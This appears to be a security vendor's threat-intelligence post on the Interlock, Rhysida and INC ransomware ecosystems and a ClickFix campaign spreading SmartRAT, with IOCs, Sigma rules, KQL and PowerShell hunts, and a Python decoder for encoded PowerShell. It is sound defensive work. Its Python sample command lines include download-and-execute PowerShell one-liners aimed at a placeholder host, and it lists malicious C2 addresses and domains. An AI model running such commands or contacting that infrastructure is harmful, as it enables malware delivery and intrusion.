Interlock, Rhysida & INC Ransomware Ecosystems + AI-Driven ClickFix: OTX Pulse Analysis

Security Arsenal Team
June 18, 2026
6 min read

Recent OTX pulse data highlights a convergence of sophisticated ransomware operations and emerging AI-driven delivery mechanisms. Primary activity centers on the Interlock (Hive0163) and Rhysida ecosystems, leveraging a complex supply chain of custom malware like NodeSnake, InterlockRAT, and JunkFiction to facilitate espionage and extortion. Concurrently, the INC ransomware group has rapidly ascended to a top-tier RaaS position, capitalizing on the void left by LockBit and BlackCat by utilizing cross-platform Rust-based encryptors. Separately, a novel AI-generated ClickFix campaign has been observed targeting the Brazilian financial sector, delivering SmartRAT via typosquatting domains and fake CAPTCHAs. These campaigns collectively demonstrate a shift toward AI-assisted infrastructure generation, multi-platform ransomware capabilities, and complex initial access vectors.

Threat Actor / Malware Profile

Interlock (Hive0163) & Rhysida

  • Malware Families: NodeSnake, InterlockRAT, JunkFiction, Supper, Interlock, Broomstick, Tomb crypter.
  • Distribution: Spear-phishing, trojanized installers, exploitation of vulnerabilities (e.g., CVE-2023-36036).
  • Payload Behavior: NodeSnake acts as a stealthy backdoor; InterlockRAT provides remote access; JunkFiction serves as a downloader. The payload chain often leads to the Interlock or Rhysida ransomware encryptors.
  • C2 Communication: Encrypted C2 channels (observed with NodeSnake), likely utilizing custom protocols over HTTP/HTTPS.
  • Persistence: Scheduled tasks, service installation, and registry modifications for backdoors (SystemBC, Sliver support).
  • Anti-Analysis: Use of the Tomb crypter to obfuscate payloads and evade static detection.

INC Ransomware

  • Malware Families: INC Ransomware (Lynx/Sinobi variants), Cobalt Strike.
  • Distribution: RaaS affiliate model, likely leveraging compromised credentials and vulnerabilities (e.g., CVE-2023-3519, CVE-2023-48788).
  • Payload Behavior: Rust-based encryptors for both Windows and Linux/ESXi systems. Features include double-extortion techniques (data theft + encryption).
  • C2 Communication: Uses TOR hidden services for victim negotiation and data leak sites (.onion domains).
  • Persistence: Via scheduled tasks and service persistence mechanisms typical of ransomware operators.
  • Anti-Analysis: Rust compilation increases analysis complexity; likely employs anti-debugging techniques.

SmartRAT (ClickFix Campaign)

  • Malware Families: SmartRAT, GhostLoader.
  • Distribution: AI-generated typosquatting domains (e.g., impersonating Brazilian banks). Users are tricked by fake CAPTCHA/BSOD screens into running malicious PowerShell commands (ClickFix).
  • Payload Behavior: PowerShell-based banking trojan (SmartRAT) with capabilities for encrypted C2, keylogging, and potentially QR code interception.
  • C2 Communication: Encrypted C2 to command and control servers.
  • Persistence: GhostLoader likely establishes persistence via registry run keys or scheduled tasks.
  • Anti-Analysis: Use of PowerShell obfuscation and AI-generated domains to bypass reputation filters.

IOC Analysis

The provided IOCs include a mix of network and file-based indicators crucial for detection:

  • Domains: Includes typosquatting domains (e.g., crefisa.online), C2 domains (e.g., windowsupdate-cdn.com), and TOR hidden services associated with INC ransomware. SOC teams should block these at the perimeter and DNS resolvers.
  • IP Addresses: C2 infrastructure IPs (e.g., 185.196.9.234, 162.141.111.227). These should be blocked on firewalls and monitored for outbound connections.
  • File Hashes: MD5, SHA1, and SHA256 hashes for malware samples (InterlockRAT, SmartRAT, INC ransomware). These can be used to scan endpoints via EDR and SIEM.
  • CVEs: Vulnerability identifiers (e.g., CVE-2023-36036, CVE-2025-5777) indicate specific exploits used for initial access. Vulnerability management is critical.

Operationalization:

  • EDR/SIEM: Import all file hashes into EDR threat feeds for immediate scanning. Correlate process executions with these hashes against DeviceProcessEvents.
  • Network Security: Block domains and IPs at the firewall, proxy, and DNS layer. Monitor DeviceNetworkEvents for connections to these indicators.
  • Threat Intelligence Platforms: Feed the IOCs into TI platforms to automatically enrich alerts and block future related artifacts.

Detection Engineering

Sigma rules (YAML)
---
title: Potential Interlock NodeSnake C2 Traffic
id: 3a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
description: Detects outbound network connections to the IP range associated with NodeSnake C2 infrastructure in the pulse. The rule matches on destination address only; user-agent or URI patterns are not covered here.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: network_connection
detection:
    selection:
        DestinationIp|startswith:
            - '185.196.9.'
        Initiated: true
    condition: selection
falsepositives:
    - Legitimate traffic to IP range (unlikely)
level: high
tags:
    - attack.command_and_control
    - attack.t1071
---
title: Suspicious PowerShell Execution via ClickFix Pattern
id: 4b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell commands often used in ClickFix campaigns involving Base64 encoded strings and suspicious flags typical of SmartRAT delivery.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -e '
            - ' -Enc '
            - 'FromBase64String'
        CommandLine|contains|all:
            - 'http://'
            - 'invoke'
    condition: selection
falsepositives:
    - Administrative scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
---
title: INC Ransomware Rust Process Execution
id: 5c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects unsigned executables launched with command-line arguments seen in Rust-based ransomware such as INC. The rule does not measure file entropy or executable path; layer those checks on via EDR file-reputation data.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '.exe'
        Signed: 'false'
        CommandLine|contains:
            - 'encrypt'
            - '--path'
    condition: selection
falsepositives:
    - Legitimate unsigned utilities (rare)
level: critical
tags:
    - attack.impact
    - attack.t1486
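
The ClickFix rule above requires the plaintext strings 'http://' and 'invoke' in CommandLine, but a payload passed via -EncodedCommand carries them as Base64-encoded UTF-16LE where the rule cannot see them. The following Python checker is an added example, not code from the original post: it decodes the encoded argument and applies the same three indicators (encoding indicator, URL, invoke) to the visible and decoded text, run over constructed sample command lines (the example.invalid URLs and script paths are constructed).

```python
import base64
import re

# Common spellings Windows PowerShell accepts for -EncodedCommand
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
INVOKE_RE = re.compile(r"\biex\b|invoke", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the -EncodedCommand payload decoded from Base64/UTF-16LE, or '' if absent or undecodable."""
    tokens = cmdline.split()
    for flag, arg in zip(tokens, tokens[1:]):
        if flag.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(arg, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def analyze(cmdline: str) -> dict:
    """Apply the ClickFix rule logic (PowerShell AND encoding indicator AND URL AND invoke)
    to the visible command line plus its decoded payload; returns verdict and decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded
    is_powershell = "powershell" in cmdline.lower()
    encoding_used = bool(decoded) or "frombase64string" in cmdline.lower()
    has_url = re.search(r"https?://", text, re.IGNORECASE) is not None
    has_invoke = INVOKE_RE.search(text) is not None
    return {"match": is_powershell and encoding_used and has_url and has_invoke, "decoded": decoded}


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build the sample below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not real telemetry)
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"),
    "powershell.exe -c \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGk=')); "
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
]


def scan(cmdlines):
    """Return the verdict for each command line, with the decoded payload for analyst review."""
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for c, r in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        print(("ALERT " if r["match"] else "ok    ") + c[:60], "| decoded:", r["decoded"][:60])
```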


KQL hunt query (Microsoft Defender Advanced Hunting)
// Hunt for network connections to known malicious IPs and domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("185.196.9.234", "162.141.111.227") or RemoteUrl has_any ("leadslaw.com", "incblog.su", "crefisa.online", "windowsupdate-cdn.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
| extend HuntTag = "OTX_Pulse_IOC_Connection"


PowerShell IOC hunt script
# IOC Hunt Script for Interlock/Rhysida/INC Malware Artifacts
# Run as Administrator

Write-Host "Starting Hunt for OTX Pulse IOCs..." -ForegroundColor Cyan

# Check for specific file hashes
$targetHashes = @(
    "f0b3e112ce4807a28e2b5d66a840ed7f",
    "edbf152ed9ac79e5d9e0111d1071af48",
    "297eb45f028d44d750297d2f932b9c91",
    "3c72e1f37f115b00c3ad6ed31bacfe8a"
)

# Scan C:\ drive for these hashes (Note: This is a basic scan, adjust scope as needed)
Write-Host "Scanning for known malicious file hashes..." -ForegroundColor Yellow
Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        # The hash set above is MD5; -contains compares case-insensitively, so the
        # uppercase hex returned by Get-FileHash matches the lowercase IOCs
        $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($hash -and $targetHashes -contains $hash) {
            Write-Host "[!] Match Found: $($_.FullName)" -ForegroundColor Red
        }
    }

# Check for suspicious network connections (Active connections)
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Yellow
$targetIPs = @("185.196.9.234", "162.141.111.227")
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($ip in $targetIPs) {
    # Filter once, then report; avoids re-scanning the connection list for output
    $hits = $connections | Where-Object { $_.RemoteAddress -eq $ip }
    if ($hits) {
        Write-Host "[!] Suspicious Connection to $ip detected!" -ForegroundColor Red
        $hits | Format-Table -AutoSize
    }
}

Write-Host "Hunt Complete." -ForegroundColor Green

Response Priorities

  • Immediate:
    • Block all listed IP addresses and domains at the firewall, proxy, and DNS layer.
    • Initiate a hunt for file hashes across all endpoints using EDR.
    • Isolate any endpoints with confirmed matches or suspicious behavior.
  • 24h:
    • Conduct identity verification and password resets for accounts on affected endpoints, specifically targeting credentials that may have been stolen by malware like InterlockRAT or SmartRAT.
    • Review logs for lateral movement indicators associated with Cobalt Strike or SystemBC.
  • 1 week:
    • Patch systems against the referenced CVEs (CVE-2023-36036, CVE-2023-3519, CVE-2025-5777).
    • Implement email filtering rules to block typosquatting domains and suspicious attachments associated with these campaigns.
    • Conduct security awareness training focused on identifying fake CAPTCHAs and social engineering techniques (ClickFix).
